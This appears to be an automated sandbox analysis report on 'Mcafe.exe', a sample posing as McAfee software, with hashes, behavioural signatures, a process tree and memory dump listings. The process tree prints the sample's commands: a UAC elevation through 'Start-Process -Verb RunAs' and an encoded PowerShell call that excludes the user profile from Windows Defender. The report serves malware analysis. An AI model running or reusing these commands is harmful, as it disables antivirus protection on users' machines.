cd0772a4089bfa360622ba94a52ccce9ffcf82064aa23862073dad58423cadde

Resubmissions

31-05-2023 15:21

230531-srdyxagb71 5

31-05-2023 14:46

230531-r5g22sfe98 7

Analysis

max time kernel
41s
max time network
62s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
31-05-2023 14:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mcafe.exe
Size

638KB
MD5

76166c4ad30e3da0060f41fe59e465f1
SHA1

31d887a689a2a6fab9723589bd02d5c15ec09924
SHA256

908d00c0d3a8fe68b7cb0da154143ac81e357b1ca043ff25ac3581d2186defcb
SHA512

e0ed4e2af54add6d449d9b4ac0ac291ed9195a96d55a44c956fd7d32f7144ef432d9da14a5d6ff00fb3e94e79df8a7278338f3c475936b62a5da3848ab538f47
SSDEEP

3072:FgXpJozm2lkCsuYDbM2ZZQ4MGGfviMQYTQbrEQ:IpC62lkCMcGGHikTk

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1620	1264	WerFault.exe	26

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1048	powershell.exe
1048	powershell.exe
1048	powershell.exe
912	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: 33	2024	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2024	AUDIODG.EXE
Token: 33	2024	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2024	AUDIODG.EXE
Token: SeDebugPrivilege	1048	powershell.exe
Token: SeDebugPrivilege	912	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1264	Mcafe.exe
1264	Mcafe.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1264 wrote to memory of 1316	1264	Mcafe.exe	29
PID 1264 wrote to memory of 1316	1264	Mcafe.exe	29
PID 1264 wrote to memory of 1316	1264	Mcafe.exe	29
PID 1316 wrote to memory of 1048	1316	cmd.exe	31
PID 1316 wrote to memory of 1048	1316	cmd.exe	31
PID 1316 wrote to memory of 1048	1316	cmd.exe	31
PID 1264 wrote to memory of 1620	1264	Mcafe.exe	32
PID 1264 wrote to memory of 1620	1264	Mcafe.exe	32
PID 1264 wrote to memory of 1620	1264	Mcafe.exe	32
PID 1048 wrote to memory of 1668	1048	powershell.exe	33
PID 1048 wrote to memory of 1668	1048	powershell.exe	33
PID 1048 wrote to memory of 1668	1048	powershell.exe	33
PID 1668 wrote to memory of 912	1668	cmd.exe	35
PID 1668 wrote to memory of 912	1668	cmd.exe	35
PID 1668 wrote to memory of 912	1668	cmd.exe	35

C:\Users\Admin\AppData\Local\Temp\Mcafe.exe
"C:\Users\Admin\AppData\Local\Temp\Mcafe.exe"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1264
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\abra.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\abra.bat"' -ArgumentList 'am_admin'"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\abra.bat" am_admin
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1668
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAJwApAA==
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:912
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1264 -s 2220
  2⤵
  - Program crash
  PID:1620

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x450
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\abra.bat

Filesize
500B

MD5
c7e2ec60b2f5e2d1061e128318cd3f61

SHA1
54b2846e89d35a67698765d0b3920a1f05784bdd

SHA256
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38

SHA512
8faabdcd2caf1e282ff7e6f5971a60e957ba5355d12a35db4b61b3de0672d9983791f4b05fab5656459733f188eb531749f64632619c9c192c31570b8a523869

Download Submit
C:\Users\Admin\AppData\Local\Temp\abra.bat

Filesize
500B

MD5
c7e2ec60b2f5e2d1061e128318cd3f61

SHA1
54b2846e89d35a67698765d0b3920a1f05784bdd

SHA256
613bb088d6d7e0cfb3acf1037adab8eb36ddd2203c3646388a9cfaa7585e2b38

SHA512
8faabdcd2caf1e282ff7e6f5971a60e957ba5355d12a35db4b61b3de0672d9983791f4b05fab5656459733f188eb531749f64632619c9c192c31570b8a523869

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4c069b84848fc2b97a90a83f78a8fed0

SHA1
18b9b0eb02455b727a81aae8d86865b6cd177a77

SHA256
975f5d0351b9a9d810dcead8a459656fe2ca10296d0cc578ca8464022e77fd91

SHA512
b0e1efcb648b7bacf2654b1c7352cbaf0c5465e9d1b54dbac6b2b99b5824b1b0341235fec6ec51a2afeb40172cc4b8f4df58f60fb157655ed7d8ee593e468b03

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FDDSXR66ANAGIEOY6F5W.temp

Filesize
7KB

MD5
4c069b84848fc2b97a90a83f78a8fed0

SHA1
18b9b0eb02455b727a81aae8d86865b6cd177a77

SHA256
975f5d0351b9a9d810dcead8a459656fe2ca10296d0cc578ca8464022e77fd91

SHA512
b0e1efcb648b7bacf2654b1c7352cbaf0c5465e9d1b54dbac6b2b99b5824b1b0341235fec6ec51a2afeb40172cc4b8f4df58f60fb157655ed7d8ee593e468b03

Download Submit
memory/912-101-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/912-112-0x00000000024BB000-0x00000000024F2000-memory.dmp

Filesize
220KB

Download
memory/912-111-0x00000000024B0000-0x0000000002530000-memory.dmp

Filesize
512KB

Download
memory/912-110-0x00000000024B0000-0x0000000002530000-memory.dmp

Filesize
512KB

Download
memory/912-102-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/1048-94-0x00000000026A4000-0x00000000026A7000-memory.dmp

Filesize
12KB

Download
memory/1048-92-0x000000001B180000-0x000000001B462000-memory.dmp

Filesize
2.9MB

Download
memory/1048-93-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/1048-95-0x00000000026AB000-0x00000000026E2000-memory.dmp

Filesize
220KB

Download
memory/1264-105-0x0000000063540000-0x0000000063550000-memory.dmp

Filesize
64KB

Download
memory/1264-76-0x00000000624D0000-0x00000000624E0000-memory.dmp

Filesize
64KB

Download
memory/1264-71-0x0000000063010000-0x0000000063020000-memory.dmp

Filesize
64KB

Download
memory/1264-66-0x0000000000190000-0x00000000001A0000-memory.dmp

Filesize
64KB

Download
memory/1264-68-0x000007FFFFEC0000-0x000007FFFFED0000-memory.dmp

Filesize
64KB

Download
memory/1264-104-0x00000000631D0000-0x00000000631E0000-memory.dmp

Filesize
64KB

Download
memory/1264-77-0x0000000063050000-0x0000000063060000-memory.dmp

Filesize
64KB

Download
memory/1264-107-0x0000000063DC0000-0x0000000063DD0000-memory.dmp

Filesize
64KB

Download
memory/1264-108-0x00000000644B0000-0x00000000644C0000-memory.dmp

Filesize
64KB

Download
memory/1264-109-0x0000000065200000-0x0000000065210000-memory.dmp

Filesize
64KB

Download
memory/1264-67-0x0000000000130000-0x0000000000140000-memory.dmp

Filesize
64KB

Download
memory/1264-70-0x0000000061E80000-0x0000000061EA0000-memory.dmp

Filesize
128KB

Download
memory/1264-106-0x00000000637A0000-0x00000000637B0000-memory.dmp

Filesize
64KB

Download
memory/1264-103-0x00000000631C0000-0x00000000631D0000-memory.dmp

Filesize
64KB

Download
memory/1264-78-0x00000000630B0000-0x00000000630C0000-memory.dmp

Filesize
64KB

Download
memory/1264-113-0x0000000000190000-0x00000000001A0000-memory.dmp

Filesize
64KB

Download
memory/1264-116-0x0000000063010000-0x0000000063020000-memory.dmp

Filesize
64KB

Download
memory/1264-115-0x0000000061E80000-0x0000000061EA0000-memory.dmp

Filesize
128KB

Download
memory/1264-114-0x0000000000130000-0x0000000000140000-memory.dmp

Filesize
64KB

Download
memory/1264-117-0x00000000624D0000-0x00000000624E0000-memory.dmp

Filesize
64KB

Download
memory/1264-119-0x00000000630B0000-0x00000000630C0000-memory.dmp

Filesize
64KB

Download
memory/1264-118-0x0000000063050000-0x0000000063060000-memory.dmp

Filesize
64KB

Download